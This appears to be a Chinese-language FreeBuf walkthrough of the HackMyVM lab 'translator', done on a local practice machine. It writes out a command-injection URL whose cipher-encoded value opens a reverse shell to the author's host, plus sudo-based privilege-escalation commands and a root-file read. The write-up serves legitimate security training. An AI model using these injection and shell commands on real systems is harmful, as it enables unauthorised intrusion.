freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hackmyvm系列9——translator
2022-08-30 22:48:21
所属地 辽宁省

前言:

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.152.0/24

nmap -sV -Pn -sC -A 192.168.152.155

1653228114_628a4252e0aab3b3bb879.png!small?1653228113132

访问web页面,发现是个在线的加密网站

1653228153_628a427980117579daec5.png!small?1653228151662

输入aaa得到zzz

http://192.168.152.155/translate.php?hmv=aaaa

1653228186_628a429a366fe4bbc202e.png!small?1653228184300

应该是根据26个字母的顺序倒着对其进行加密,尝试执行命令

http://192.168.152.155/translate.php?hmv=aaaa|rw

1653228263_628a42e7e005c2e5445ea.png!small?1653228262057

二、反弹shell

http://192.168.152.155/translate.php?hmv=aaaa|mx -x hs 192.168.152.213 6666

获得稳定的shell

python3 -c "import pty;pty.spawn('/bin/bash');"

在当前目录下发现hvxivg,对其进行读取

对其进行解密得到

1653228577_628a4421275f626b9b3a0.png!small?1653228575245

cat/etc/passwd

查看存在用户,对其进行登录

测试发现ocean用户可以成功登录

三、权限提升

sudo -l

sudo -u india choom -n 0 /bin/sh

获得稳定的shell

python3 -c "import pty;pty.spawn('/bin/bash');"

sudo -l

利用其任意文件读取得到root.txt

sudo -u root /usr/local/bin/trans -i /root/root.txt -no-autocorrect

# 靶场实战 # 靶场攻关
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录